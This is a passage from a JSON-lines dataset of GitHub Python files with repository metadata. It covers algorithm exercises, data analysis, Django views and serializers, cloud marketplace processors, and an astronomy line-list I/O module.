count of open brackets is not 0, \n# indicating that it is impossible to balance the string.\n\ndef minimumSwaps(brackets):\n # Initialize a counter for the number of swaps needed\n swaps = 0\n \n # Initialize a counter for the number of open brackets\n open_count = 0\n \n # Iterate through the string in reverse order\n for i in range(len(brackets)-1, -1, -1):\n # If the current character is an open bracket, increase the count of open brackets\n if brackets[i] == '(':\n open_count += 1\n # If the current character is a closed bracket,\n # increase the number of swaps needed if the count of open brackets is 0,\n # or decrease the count of open brackets otherwise\n else:\n if open_count == 0:\n swaps += 1\n else:\n open_count -= 1\n \n # Return the number of swaps needed, or -1 if the count of open brackets is not 0\n return swaps if open_count == 0 else -1\n\n\n# To further optimize the solution by using a stack to keep track of the open brackets instead of a separate counter. \n# This will allow us to avoid iterating through the entire string and stop as soon as we find an invalid character.\n\ndef minimumSwaps(brackets):\n # Initialize a counter for the number of swaps needed\n swaps = 0\n \n # Initialize a stack for the open brackets\n open_stack = []\n \n # Iterate through the string in reverse order\n for i in range(len(brackets)-1, -1, -1):\n # If the current character is an open bracket, add it to the stack\n if brackets[i] == '(':\n open_stack.append(brackets[i])\n # If the current character is a closed bracket,\n # increase the number of swaps needed if the stack is empty,\n # or pop the top element from the stack otherwise\n else:\n if not open_stack:\n swaps += 1\n else:\n open_stack.pop()\n \n # Return the number of swaps needed, or -1 if the stack is not empty\n return swaps if not open_stack else -1\n\n","repo_name":"satyajeetramnit/Placement-2023","sub_path":"Yubi-CredAvenue/minimumSwaps.py","file_name":"minimumSwaps.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"48"} +{"seq_id":"20003564710","text":"# Imports as always...\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nfrom datetime import datetime\r\nfrom textblob import TextBlob\r\n\r\nimport miscellaneous_helpers as mh\r\n\r\n\r\n# Primary function for computing success scores for given data.\r\ndef compute_scores(listing_directory, review_rate=0.72, min_price=1, max_price=10000):\r\n '''\r\n This function will read the data from listing_directory to generate the success score for each listing id.\r\n We also set a minimum and maximum price, mainly to allow us to prevent erroneous data.\r\n\r\n listing_dictionary will be a path (as a string) to the listings.csv file.\r\n review_rate is the estimated (or known) ratio of the number of reviews to the number of bookings.\r\n Brian Chesky, in his almighty wisdom, has claimed this is around 72%, so that will be the default.\r\n min_price and max_price will be numerical values denoting the minimum price and maximum price.\r\n Any listings with an advertised price outside of their defined range will be disregarded.\r\n\r\n The return will be a dataframe with columns \"id\" and \"success_score\".\r\n '''\r\n\r\n # Get the relevant data for estimating success.\r\n success_data = pd.read_csv(listing_directory)[['id', 'price', 'minimum_nights_avg_ntm', 'number_of_reviews_ltm', 'review_scores_rating']]\r\n\r\n # Remove listings lacking all the necessary data for success computation.\r\n success_data = success_data.dropna()\r\n\r\n # Transform price data...\r\n\r\n # Convert prices to floats.\r\n success_data.price = success_data.price.apply(lambda x : float(re.sub(',', '', x[1:])))\r\n\r\n # Drop data where price is outside of the given range.\r\n success_data = success_data[(success_data.price >= min_price) & (success_data.price <= max_price)]\r\n\r\n # Apply log transformation.\r\n success_data['log_price'] = np.log(success_data.price)\r\n\r\n # Compute the success scores for each listing (where all data is available)...\r\n\r\n successes = []\r\n\r\n for i in range(len(success_data)):\r\n listing = success_data.iloc[i]\r\n\r\n # Following from Inside Airbnb's \"San Francisco Model\"...\r\n\r\n estimated_bookings = listing.number_of_reviews_ltm / review_rate\r\n occupied_days = estimated_bookings * listing.minimum_nights_avg_ntm\r\n probability_of_rental = min(365, occupied_days) / 365\r\n\r\n # Compute the success.\r\n success = probability_of_rental * listing.log_price * (listing.review_scores_rating / 5)\r\n successes.append(success)\r\n\r\n return_data = pd.DataFrame({'id' : success_data.id, 'success_score' : successes})\r\n\r\n return return_data","repo_name":"BenPrie/Airbnb-Unstructured-Data-Analysis","sub_path":"success_metric.py","file_name":"success_metric.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32666209847","text":"from cv import models as cv_models\nfrom main import models as main_models\nfrom api.fields import PrimaryKeyRelatedIdField\nfrom api.serializers import ModelSerializer\nfrom api.handlers.cv.serializers import CvInlineShortSerializer\nfrom api.handlers.main.serializers.request.request import RequestInlineSerializer\n\n__all__ = [\n 'TimeSheetRowCreateSerializer',\n 'TimeSheetRowUpdateSerializer',\n 'TimeSheetRowReadSerializer',\n]\n\n\nclass TimeSheetRowBaseSerializer(ModelSerializer):\n request_id = PrimaryKeyRelatedIdField(\n queryset=main_models.Request.objects,\n label=main_models.TimeSheetRow._meta.get_field('request').verbose_name,\n )\n\n class Meta:\n model = main_models.TimeSheetRow\n fields = [\n 'request_id', 'date_from', 'date_to', 'task_name', 'task_description', 'work_time',\n 'created_at', 'updated_at',\n ]\n\n\nclass TimeSheetRowCreateSerializer(TimeSheetRowBaseSerializer):\n cv_ids = PrimaryKeyRelatedIdField(\n queryset=cv_models.CV.objects,\n many=True, required=True,\n label=main_models.TimeSheetRow._meta.get_field('cv').verbose_name,\n )\n\n class Meta(TimeSheetRowBaseSerializer.Meta):\n fields = TimeSheetRowBaseSerializer.Meta.fields + [\n 'cv_ids',\n ]\n\n\nclass TimeSheetRowUpdateSerializer(TimeSheetRowBaseSerializer):\n cv_id = PrimaryKeyRelatedIdField(\n queryset=cv_models.CV.objects,\n label=main_models.TimeSheetRow._meta.get_field('cv').verbose_name,\n )\n\n class Meta(TimeSheetRowBaseSerializer.Meta):\n fields = TimeSheetRowBaseSerializer.Meta.fields + ['cv_id', 'id']\n\n\nclass TimeSheetRowReadSerializer(TimeSheetRowUpdateSerializer):\n request = RequestInlineSerializer()\n cv = CvInlineShortSerializer()\n\n class Meta(TimeSheetRowUpdateSerializer.Meta):\n fields = TimeSheetRowUpdateSerializer.Meta.fields + [\n 'request', 'cv',\n ]\n","repo_name":"skills-cloud/b2b-cloud","sub_path":"api/handlers/main/serializers/request/time_sheet.py","file_name":"time_sheet.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5437513442","text":"def MassVote(N, Votes):\n # ищем максимальное значение в массиве и его позицию\n vote = 0\n for i in range(len(Votes)):\n if Votes[i] > vote:\n vote = Votes[i]\n number = i\n\n # проверяем есть ли еще кандидаты с тем же числом голосов\n count = 0\n for i in range(N):\n if Votes[i] == vote:\n count += 1\n\n # считаем процент голосов за каждого кандидата\n sum = 0\n for ani in Votes:\n sum += ani # - 100%\n Persent = []\n for i in range(N):\n value = Votes[i] * 100 / sum\n # округляем получившиеся значения до 3-го знака\n value = int(value * 10000)\n value1 = value // 10\n value2 = value % 10\n if value2 >= 5:\n value1 += 1\n value = value1 / 1000\n Persent.append(value)\n \n \n if count == 1 and Persent[number] > 50.0:\n result = \"majority winner \" + str(number + 1)\n elif count == 1 and Persent[number] <= 50.0:\n result = \"minority winner \" + str(number + 1)\n elif count > 1:\n result = \"no winner\"\n\n return result","repo_name":"stankv/Studing","sub_path":"12_MassVote.py","file_name":"12_MassVote.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8663651886","text":"\"\"\" Module for I/O in arclines\n\"\"\"\nfrom __future__ import (print_function, absolute_import, division, unicode_literals)\n\nimport numpy as np\nimport os\nimport datetime\nimport pdb\n\nfrom astropy.table import Table, Column, vstack\nfrom astropy.io import fits\n\nfrom linetools import utils as ltu\n\nimport arclines # For path\nfrom arclines import defs\nline_path = arclines.__path__[0]+'/data/lists/'\nnist_path = arclines.__path__[0]+'/data/NIST/'\n\n\ndef load_by_hand():\n \"\"\" By-hand line list\n Parameters\n ----------\n line_file\n add_path\n\n Returns\n -------\n byhand : Table\n\n \"\"\"\n str_len_dict = defs.str_len()\n\n src_file = arclines.__path__[0]+'/data/sources/by_hand_list.ascii'\n # Read\n line_list = Table.read(src_file, format='ascii.fixed_width', comment='#')\n # Add\n line_list['NIST'] = 1\n # Deal with Instr and Source\n ilist, slist = [], []\n for row in line_list:\n ilist.append(defs.instruments()[row['sInstr']]) # May need to split\n slist.append(row['sSource'])\n line_list['Instr'] = ilist\n line_list['Source'] = np.array(slist, dtype='S{:d}'.format(str_len_dict['Source']))\n # Trim\n return line_list[['ion', 'wave', 'NIST', 'Instr', 'amplitude', 'Source']]\n\n\ndef load_line_list(line_file, add_path=False, use_ion=False, NIST=False):\n \"\"\"\n Parameters\n ----------\n line_file : str\n Full path to line_list or name of ion\n add_path : bool, optional\n Not yet implemented\n NIST : bool, optional\n NIST formatted table?\n\n Returns\n -------\n line_list : Table\n\n \"\"\"\n if use_ion:\n line_file = line_path+'{:s}_lines.dat'.format(line_file)\n line_list = Table.read(line_file, format='ascii.fixed_width', comment='#')\n # NIST?\n if NIST:\n # Remove unwanted columns\n tkeys = line_list.keys()\n for badkey in ['Ritz','Acc.','Type','Ei','Lower','Upper','TP','Line']:\n for tkey in tkeys:\n if badkey in tkey:\n line_list.remove_column(tkey)\n # Relative intensity -- Strip junk off the end\n reli = []\n for imsk, idat in zip(line_list['Rel.'].mask, line_list['Rel.'].data):\n if imsk:\n reli.append(0.)\n else:\n try:\n reli.append(float(idat))\n except ValueError:\n try:\n reli.append(float(idat[:-1]))\n except ValueError:\n reli.append(0.)\n line_list.remove_column('Rel.')\n line_list['RelInt'] = reli\n #\n gdrows = line_list['Observed'] > 0. # Eliminate dummy lines\n line_list = line_list[gdrows]\n line_list.rename_column('Observed','wave')\n # Others\n # Grab ion name\n i0 = line_file.rfind('/')\n i1 = line_file.rfind('_')\n ion = line_file[i0+1:i1]\n line_list.add_column(Column([ion]*len(line_list), name='Ion', dtype='U5'))\n line_list.add_column(Column([1]*len(line_list), name='NIST'))\n\n # Return\n return line_list\n\n\ndef load_line_lists(lines, unknown=False, skip=False, all=False, NIST=False):\n \"\"\" Loads a series of line list files\n\n Parameters\n ----------\n lamps : list\n unknown : bool, optional\n skip : bool, optional\n Skip missing line lists (mainly for building)\n NIST : bool, optional\n Load the full NIST linelists\n\n Returns\n -------\n line_list : Table\n\n \"\"\"\n import glob\n\n # All?\n if all:\n line_files = glob.glob(line_path+'*_lines.dat')\n lines = []\n for line_file in line_files:\n i0 = line_file.rfind('/')\n i1 = line_file.rfind('_')\n lines.append(line_file[i0+1:i1])\n\n # Read standard files\n lists = []\n for line in lines:\n if NIST:\n line_file = nist_path+'{:s}_vacuum.ascii'.format(line)\n else:\n line_file = line_path+'{:s}_lines.dat'.format(line)\n if not os.path.isfile(line_file):\n if not skip:\n import pdb; pdb.set_trace()\n raise IOError(\"Input line {:s} is not included in arclines\".format(line))\n else:\n lists.append(load_line_list(line_file, NIST=NIST))\n # Stack\n if len(lists) == 0:\n return None\n line_lists = vstack(lists, join_type='exact')\n\n # Unknown\n if unknown:\n unkn_lines = load_unknown_list(lines)\n unkn_lines.remove_column('line_flag') # may wish to have this info\n # Stack\n line_lists = vstack([line_lists, unkn_lines])\n\n # Return\n return line_lists\n\n\ndef load_source_table():\n \"\"\" Load table of arcline sources\n\n Returns\n -------\n sources : Table\n\n \"\"\"\n src_file = arclines.__path__[0]+'/data/sources/arcline_sources.ascii'\n # Load\n sources = Table.read(src_file, format='ascii.fixed_width', comment='#')\n # Return\n return sources\n\n\ndef load_nist(ion):\n \"\"\"Parse a NIST ASCII table. Note that the long ---- should have\n been commented out and also the few lines at the start.\n\n Parameters\n ----------\n ion : str\n Name of ion\n Returns\n -------\n tbl : Table\n Table of lines\n \"\"\"\n import glob\n # Root (for development only)\n root = arclines.__path__[0]\n # Find file\n srch_file = root + '/data/NIST/'+ion+'_vacuum.ascii'\n nist_file = glob.glob(srch_file)\n if len(nist_file) == 0:\n raise IOError(\"Cannot find NIST file {:s}\".format(srch_file))\n # Read\n nist_tbl = Table.read(nist_file[0], format='ascii.fixed_width')\n gdrow = nist_tbl['Observed'] > 0. # Eliminate dummy lines\n nist_tbl = nist_tbl[gdrow]\n # Now unique values only (no duplicates)\n uniq, indices = np.unique(nist_tbl['Observed'],return_index=True)\n nist_tbl = nist_tbl[indices]\n # Deal with Rel\n agdrel = []\n for row in nist_tbl:\n try:\n gdrel = int(row['Rel.'])\n except:\n try:\n gdrel = int(row['Rel.'][:-1])\n except:\n gdrel = 0\n agdrel.append(gdrel)\n agdrel = np.array(agdrel)\n # Remove and add\n nist_tbl.remove_column('Rel.')\n nist_tbl.remove_column('Ritz')\n nist_tbl['RelInt'] = agdrel\n #nist_tbl.add_column(Column([ion]*len(nist_tbl), name='Ion', dtype='S5'))\n nist_tbl.add_column(Column([ion]*len(nist_tbl), name='Ion', dtype='U5'))\n nist_tbl.rename_column('Observed','wave')\n # Return\n return nist_tbl\n\n\ndef load_unknown_list(lines, unknwn_file=None, all=False):\n \"\"\"\n Parameters\n ----------\n lines : list\n Restricted lines; use all=True for all\n unknwn_file : str, optional\n all : bool, optional\n\n\n Returns\n -------\n unknwn_lines : Table\n\n \"\"\"\n line_dict = defs.lines()\n # Load\n line_path = arclines.__path__[0]+'/data/lists/'\n if unknwn_file is None:\n unknwn_file = line_path+'UNKNWNs.dat'\n line_list = load_line_list(unknwn_file)\n # Cut on input lamps?\n if all:\n return line_list\n else:\n msk = np.array([False]*len(line_list))\n for line in lines:\n line_flag = line_dict[line]\n match = line_list['line_flag'] % (2*line_flag) >= line_flag\n msk[match] = True\n # Finish\n return line_list[msk]\n\ndef load_spectrum(spec_file, index=0):\n \"\"\" Load a simple spectrum from input file\n\n Parameters\n ----------\n spec_file : str\n .fits -- Assumes simple ndarray in 0 extension\n .ascii -- Assumes Table.read(format='ascii') will work with single column\n\n Returns\n -------\n\n \"\"\"\n import h5py\n iext = spec_file.rfind('.')\n if 'ascii' in spec_file[iext:]:\n tbl = Table.read(spec_file, format='ascii')\n key = tbl.keys()[0]\n spec = tbl[key].data\n elif 'fits' in spec_file[iext:]:\n spec = fits.open(spec_file)[0].data\n elif 'hdf5' in spec_file[iext:]:\n hdf = h5py.File(spec_file, 'r')\n if 'arcs' in hdf.keys():\n print(\"Taking arc={:d} in this file\".format(index))\n spec = hdf['arcs/'+str(index)+'/spec'].value\n else:\n raise IOError(\"Not ready for this hdf5 file\")\n elif 'json' in spec_file[iext:]:\n jdict = ltu.loadjson(spec_file)\n try:\n spec = np.array(jdict['spec'])\n except KeyError:\n raise IOError(\"spec not in your JSON dict\")\n # Return\n return spec\n\ndef write_line_list(tbl, outfile):\n \"\"\"\n Parameters\n ----------\n tbl\n outfile\n \"\"\"\n # Format\n tbl['wave'].format = '10.4f'\n # Write\n with open(outfile,'w') as f:\n f.write('# Creation Date: {:s}\\n'.format(str(datetime.date.today().strftime('%Y-%b-%d'))))\n tbl.write(f, format='ascii.fixed_width')\n","repo_name":"pypeit/arclines","sub_path":"arclines/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":8770,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20090241891","text":"import heapq\n\ndef make_edges(road):\n edges = {}\n for (a,b,w) in road:\n edges[a] = edges.get(a, []) + [(b, w)]\n edges[b] = edges.get(b, []) + [(a, w)]\n return edges\n\ndef solution(N, road, K):\n answer = 0\n INF = float(\"inf\")\n distance = [INF] * (N + 1)\n distance[1] = 0\n queue = []\n edges = make_edges(road)\n heapq.heappush(queue,[0,1])\n processed = [0] * (N + 1)\n while queue:\n node = heapq.heappop(queue)[1]\n if processed[node]:\n continue\n processed[node] = 1\n for arrive, weight in edges[node]:\n if distance[arrive] > weight + distance[node]:\n distance[arrive] = weight + distance[node]\n heapq.heappush(queue,[distance[arrive],arrive])\n for i in distance:\n if i <= K:\n answer += 1\n return answer","repo_name":"alibreo3754/Study_Algorithm","sub_path":"Python/programmers/lv3_delivery.py","file_name":"lv3_delivery.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36055434925","text":"#Hashing the output as well as the correct answer prevents cheating\nimport hashlib\n#System functions (for print capture):\nimport sys\nfrom cStringIO import StringIO\n\n#Setting up the input and output redirection:\nbackup_stdin = sys.stdin\nbackup_stdout = sys.stdout\nname_input = 'Lee Cardholder'\nbalance_input = 120.50\nsys.stdin = StringIO('{0:s}\\n{1:f}'.format(name_input,balance_input))\nsys.stdout = StringIO()\n#The exercise script:\nimport exercises.input as proj_input\n#Getting the printed values into a list of strings:\nprinted_output = sys.stdout.getvalue().lower().splitlines()\nprinted_output_nospaces = [''.join(line.split()) for line in printed_output]\n#Closing the stream and restoring normal functionality:\nsys.stdin.close()\nsys.stdout.close()\nsys.stdin = backup_stdin\nsys.stdout = backup_stdout\n\n#The testing function library:\nimport testing_functions as tf\n#Configuration parameters:\nimport settings\n\ntester = tf.TestClass(settings.course_id,settings.course_repo_name,\n stored_results_file=settings.stored_results_file,\n no_upload_file=settings.upload_sentinel)\n\ndef test_name_input():\n output_name = None\n if hasattr(proj_input,'name'):\n output_name = proj_input.name\n tester.run_comparison(output_name,\n name_input,\n 'You are not reading in user input and saving it to the `name` variable correctly.',\n 'Not yet implemented reading a name.')\ndef test_balance_input():\n output_balance = None\n if hasattr(proj_input,'balance'):\n output_balance = proj_input.balance\n tester.run_comparison(output_balance,\n balance_input,\n 'You are not reading in user input and saving it to the `balance` variable correctly.',\n 'Not yet implemented reading the balance.')\n\n","repo_name":"zeroonetraining/Python_Foundations_I","sub_path":"tests/test_input.py","file_name":"test_input.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15164580340","text":"from django.views.generic import ListView, DetailView, TemplateView\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\nfrom django.views.generic.edit import FormView\nfrom django.contrib.auth import login, logout\nfrom cinema.models import Movie\nfrom account.models import Profile\nfrom django.http import JsonResponse\n\n\nclass MovieDetail(DetailView):\n template_name = 'cinema/movie_detail.html'\n model = Movie\n\n def get_context_data(self, *args, **kwargs):\n # Call the base implementation first to get a context\n context = super(MovieDetail, self).get_context_data(**kwargs)\n #get profile user data from account.models\n context['profile'] = Profile.objects.get(user=self.request.user.pk)\n return context\n\nclass MovieSearch(View):\n def post(self, request, *args, **kwargs):\n search_text = request.POST['search_text']\n json_result = []\n if search_text is not None and search_text != u\"\":\n results = Movie.objects.filter(title__contains=search_text)\n else:\n results = []\n\n for movie in results:\n json_result.append({\n \"title\": movie.title,\n \"url\": movie.get_absolute_url(),\n })\n return JsonResponse({\"result\": json_result})\n\nclass LoginPage(FormView):\n form_class = AuthenticationForm\n # If successful, redirect to home.\n success_url = \"/\"\n\n def dispatch(self, request, *args, **kwargs):\n # if user is authenticated than we need to display a main page with movies\n if request.user.is_authenticated:\n self.template_name = \"cinema/movies_list.html\"\n # if not, display login page instead\n else:\n self.template_name = \"cinema/login-form.html\"\n return super(LoginPage, self).dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(LoginPage, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated:\n #get profile user data from account.models\n context['profile'] = Profile.objects.get(user=self.request.user.pk)\n # get all Movies from database without filtration\n context['object_list'] = Movie.objects.all()\n else:\n # Call the base implementation first to get a context\n context['form'].fields['username'].label = \"\"\n context['form'].fields['username'].widget.attrs[\"placeholder\"] = \"username\"\n\n context['form'].fields['password'].label = \"\"\n context['form'].fields['password'].widget.attrs[\"placeholder\"] = \"password\"\n # get all Movies from database without filtration\n context['object_list'] = Movie.objects.all()\n return context\n\n def form_valid(self, form):\n # raise an error if user already authenticated\n if not self.request.user.is_authenticated:\n # We receive object of the user on the basis of the data entered into the form.\n self.user = form.get_user()\n # We perform user authentication.\n login(self.request, self.user)\n else:\n raise Http404\n return super(LoginPage, self).form_valid(form)\n\nclass LogoutView(View):\n def get(self, request):\n logout(request)\n return HttpResponseRedirect(\"/\")\n","repo_name":"Oleg-Pasternak/DjangoCinemaProject","sub_path":"cinema/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13806528386","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import serializers\nfrom rest_framework.reverse import reverse\n\nfrom waldur_mastermind.marketplace import processors, signals\nfrom waldur_mastermind.packages import models as package_models\nfrom waldur_mastermind.packages import views as package_views\nfrom waldur_openstack.openstack import models as openstack_models\nfrom waldur_openstack.openstack import views as openstack_views\nfrom waldur_openstack.openstack_tenant import views as tenant_views\n\nfrom . import utils\n\n\nclass TenantCreateProcessor(processors.CreateResourceProcessor):\n def get_serializer_class(self):\n return package_views.OpenStackPackageViewSet.create_serializer_class\n\n def get_viewset(self):\n return package_views.OpenStackPackageViewSet\n\n def get_post_data(self):\n order_item = self.order_item\n\n try:\n template = order_item.plan.scope\n except ObjectDoesNotExist:\n template = None\n except AttributeError:\n template = None\n\n if not isinstance(template, package_models.PackageTemplate):\n raise serializers.ValidationError('Plan has invalid scope. VPC package template is expected.')\n\n project = order_item.order.project\n\n project_url = reverse('project-detail', kwargs={'uuid': project.uuid.hex})\n spl_url = processors.get_spl_url(openstack_models.OpenStackServiceProjectLink, order_item)\n\n fields = (\n 'name',\n 'description',\n 'user_username',\n 'user_password',\n 'subnet_cidr',\n 'skip_connection_extnet',\n 'availability_zone',\n )\n\n quotas = utils.map_limits_to_quotas(order_item.limits)\n\n return dict(\n project=project_url,\n service_project_link=spl_url,\n template=template.uuid.hex,\n quotas=quotas,\n **processors.copy_attributes(fields, order_item)\n )\n\n def get_scope_from_response(self, response):\n return package_models.OpenStackPackage.objects.get(uuid=response.data['uuid']).tenant\n\n\nclass TenantUpdateProcessor(processors.UpdateResourceProcessor):\n\n def get_serializer_class(self):\n return package_views.OpenStackPackageViewSet.change_serializer_class\n\n def get_view(self):\n return package_views.OpenStackPackageViewSet.as_view({'post': 'change'})\n\n def get_post_data(self):\n resource = self.get_resource()\n try:\n package = package_models.OpenStackPackage.objects.get(tenant=resource)\n except ObjectDoesNotExist:\n raise serializers.ValidationError('OpenStack package for tenant does not exist.')\n\n template = self.order_item.plan.scope\n\n return {\n 'package': package.uuid.hex,\n 'template': template.uuid.hex,\n }\n\n def update_limits_process(self, user):\n scope = self.order_item.resource.scope\n if not scope or not isinstance(scope, openstack_models.Tenant):\n signals.limit_update_failed.send(\n sender=self.order_item.resource.__class__,\n order_item=self.order_item,\n message='Limit updating is available only for tenants.'\n )\n return\n\n utils.update_limits(self.order_item)\n\n\nclass TenantDeleteProcessor(processors.DeleteResourceProcessor):\n viewset = openstack_views.TenantViewSet\n\n\nclass InstanceCreateProcessor(processors.BaseCreateResourceProcessor):\n viewset = tenant_views.InstanceViewSet\n\n fields = (\n 'name',\n 'description',\n 'flavor',\n 'image',\n 'security_groups',\n 'internal_ips_set',\n 'floating_ips',\n 'system_volume_size',\n 'system_volume_type',\n 'data_volume_size',\n 'data_volume_type',\n 'volumes',\n 'ssh_public_key',\n 'user_data',\n 'availability_zone',\n )\n\n\nclass InstanceDeleteProcessor(processors.DeleteResourceProcessor):\n viewset = tenant_views.InstanceViewSet\n\n\nclass VolumeCreateProcessor(processors.BaseCreateResourceProcessor):\n viewset = tenant_views.VolumeViewSet\n\n fields = (\n 'name',\n 'description',\n 'image',\n 'size',\n 'availability_zone',\n 'type',\n )\n\n\nclass VolumeDeleteProcessor(processors.DeleteResourceProcessor):\n viewset = tenant_views.VolumeViewSet\n","repo_name":"vasim-rana/waldur-mastermind","sub_path":"src/waldur_mastermind/marketplace_openstack/processors.py","file_name":"processors.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"6120579616","text":"\"\"\"\r\n Auteur : Joël Dendaletche\r\n\r\n Mise en forme de l'affichage d'une table de données en format\r\n CSV :\r\n Comma Separated values\r\n https://fr.wikipedia.org/wiki/Comma-separated_values\r\n\r\n utilisé pour échanger des données entre logiciels :\r\n carnet d'adresses sur gmail\r\n excel, libre office calc\r\n \r\n Exercices : http://jodenda.free.fr/programmeNSI/cours/\r\n traitementDonneesEnTables.html\r\n \r\n Correction proposée pour l'exercices 5 : requètes et leurs \r\n solutionnement utilisant les tables\r\n\"\"\"\r\nfrom exo3 import lireCSV # fonction de lecture et de construction \r\n# de la liste de dictionnaires\r\n\r\n# fonctions d'affichage\r\nfrom exo4 import printTableformatee, printTableformateeDeco \r\n\r\n########################################################################\r\ndef printTitre( texte ) :\r\n l = len(texte)\r\n print(\" \" * 10 + \"╔\"+ \"═\" * (l+4) + \"╗\")\r\n print(\" \" * 10 + \"║ \",texte,\"║\")\r\n print(\" \" * 10 + \"╚\"+ \"═\" * (l+4) + \"╝\") \r\n \r\n########################################################################\r\n# exo5 1 : compter les enregistrements dont le code postal est \r\n# inférieur à codePostal\r\n######################################################################## \r\ndef exo5_1 (table) :\r\n printTitre(\"Exercice 5.1 : statistiques sur le code postal\")\r\n \r\n codePostal = \"\"\r\n while codePostal == \"\" :\r\n try : # essaye ce qui suit\r\n codePostal = int(input(\"Donner un nombre à 5 chiffres de code postal :\"))\r\n\r\n print (\"\\n\\n\\nRequète : recherche des gens qui habitent \",\r\n \"dans un département dont le code postal est \",\r\n \"inférieur à \", str(codePostal) )\r\n\r\n except : # est exécuté si l'essai a conduit à un retour d'erreur\r\n print(\"SVP rentrer un nombre valide de code Postal\")\r\n reponse = [] #initialisation de la liste des réponses attendues\r\n #################################################################### \r\n for enregistrement in table :\r\n if int(enregistrement[\"code Postal\"]) < 30000 :\r\n reponse.append(enregistrement)\r\n #################################################################### \r\n nRep = len (reponse) # nombre de réponses\r\n if nRep == 0 :\r\n print(\"Il n'y a aucun enregistrement qui correspond à la \",\r\n \"requète\")\r\n else :\r\n print (\"Il y a \" + str(nRep) + \" réponses : \")\r\n \r\n printTableformateeDeco (reponse)\r\n########################################################################\r\n# exo5 2 : compter les fiches ou enregistrements dont le numéro de \r\n# dossier est inférieur à numDossier\r\n######################################################################## \r\ndef exo5_2 (table) :\r\n printTitre(\"Exercice 5.2 : statistiques sur le numéro de dossier\")\r\n \r\n numDossier = 0\r\n while numDossier <= 0 or numDossier > 9999 :\r\n try : # essaye ce qui suit\r\n numDossier = int(input(\"Donner un numéro de dossier à 4 chiffres :\"))\r\n\r\n except : # est exécuté si l'essai a conduit à un retour d'erreur\r\n print(\"SVP rentrer un nombre à 4 chiffres !\")\r\n \r\n \r\n print(\"Requète : pourcentage d'enregistrements dont le numéro de \",\r\n \"dossier est plus grand que \", numDossier ,\" inclus\")\r\n reponse = [] #initialisation de la liste des réponses attendues\r\n #################################################################### \r\n for enregistrement in table :\r\n if int(enregistrement[\"Dossier num\"]) >= numDossier :\r\n reponse.append(enregistrement)\r\n #################################################################### \r\n nRep = len (reponse) # nombre de réponses\r\n if nRep == 0 :\r\n print(\"Il n'y a aucun enregistrement qui correspond à la \",\r\n \"requète\")\r\n else :\r\n print(\"Il y a \",nRep / len(table) * 100, \"% des enregistrements\",\r\n \" qui correspondent à la requète.\")\r\n printTitre(\"Table des fiches dont le numéro de dossier est plus \"+\r\n\t\t\t\t\"grand que \"+str( numDossier)+ \" inclus\")\r\n printTableformateeDeco (reponse)\r\n########################################################################\r\n# exo5 3 : pourcentage d'enregistrements dont le nom commence par lettre\r\n######################################################################## \r\nalphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m', 'n',\r\n\t\t\t'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\ndef exo5_3 (table) :\r\n texte =\" Exercice 5.3 : pourcentage d'enregistrements dont le nom commence par une lettre à choisir :\"\r\n printTitre(texte)\r\n \r\n lettre = \"\"\r\n while lettre.lower() not in alphabet :\r\n try : # essaye ce qui suit\r\n lettre = input(\"Donner une lettre de l'alphabet :\")\r\n\r\n except : # est exécuté si l'essai a conduit à un retour d'erreur\r\n print(\"Donner une seule lettre de l'alphabet !\")\r\n \r\n \r\n print(\"Requète : pourcentage d'enregistrements dont le nom \",\r\n \"commence par \", lettre)\r\n reponse = [] #initialisation de la liste des réponses attendues\r\n #################################################################### \r\n for enregistrement in table :\r\n if enregistrement[\"Nom\"][0].lower() == lettre :\r\n reponse.append(enregistrement)\r\n #################################################################### \r\n nRep = len (reponse) # nombre de réponses\r\n if nRep == 0 :\r\n print(\"Il n'y a aucun enregistrement qui correspond à la \",\r\n \"requète\")\r\n else :\r\n print(\"Il y a \",nRep / len(table) * 100, \"% des enregistrements\",\r\n \" qui correspondent à la requète.\")\r\n printTitre(\"Table des fiches dont le nom commence par \"+ lettre)\r\n \r\n printTableformateeDeco (reponse)\r\n######################################################################## \r\ndef viderEcran () :\r\n import os\r\n #os.system('cls') # efface l'écran de la console cmd.exe sur windows\r\n os.system('clear') # on linux / os x\r\n \r\n print(\"Le fichier BDD.csv est lu et converti en liste de \",\r\n \"dictionnaires\")\r\n\r\n########################################################################\r\n# les codes suivants sont des codes de test :\r\n######################################################################## \r\ndef main() : \r\n \"\"\"\r\n Fonction de test de lireCSV\r\n \"\"\"\r\n print(\"Efface l'écran : \"+ 57 * \"\\n\")\r\n print(\"___________________________________________________________\",\r\n \"____\")\r\n \r\n table = lireCSV(\"BDD.csv\")\r\n # test de la deuxième fonction d'affichage décoratif\r\n printTableformateeDeco (table)\r\n print(\"\\nLa table contient \", len(table), \r\n \"lignes ou fiches ou enregistrements.\")\r\n\r\n 